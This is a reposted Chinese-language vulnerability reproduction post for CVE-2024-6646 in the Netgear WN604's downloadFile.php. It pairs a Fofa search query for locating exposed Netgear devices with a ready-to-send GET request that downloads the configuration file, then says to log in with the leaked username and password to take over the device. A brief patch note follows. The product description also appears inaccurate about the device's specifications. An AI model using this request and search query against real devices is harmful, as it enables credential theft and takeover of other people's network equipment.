Netgear-WN604 downloadFile.php 信息泄露复现(CVE-2024-6646)

0x01 产品描述：

        NETGEAR WN604是一款功能强大的双频AC1200无线路由器,非常适合中大型家庭和企业使用。它支持最新的802.11ac无线标准,能提供高达1200Mbps的无线传输速度。路由器具备千兆有线网口和3个100Mbps有线网口,可满足有线和无线设备的接入需求。此外,它还内置了QoS、访问控制、加密等高级安全和管理功能,可以确保网络的稳定性和安全性。凭借NETGEAR Genie app,用户还可以方便地远程管理和监控路由器。

0x02 漏洞描述：

     Netgear的WN604产品存在一个漏洞，该漏洞存在于Web界面的某个未知功能中，影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件，攻击者可以获取敏感信息。该攻击可能远程发起，获取配置文件中用户名密码，从而登录接管系统。

0x03 影响版本：

Netgear wn系列

0x04 搜索语句：

Fofa：title=="Netgear"

0x05 漏洞复现：

通过downloadFile.php获取配置文件数据

GET /downloadFile.php?file=config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

 通过配置文件泄漏的用户名密码进行登录

0x06 修复建议：

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.netgear.com/uk

原文地址：https://blog.csdn.net/xc_214/article/details/142697835

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！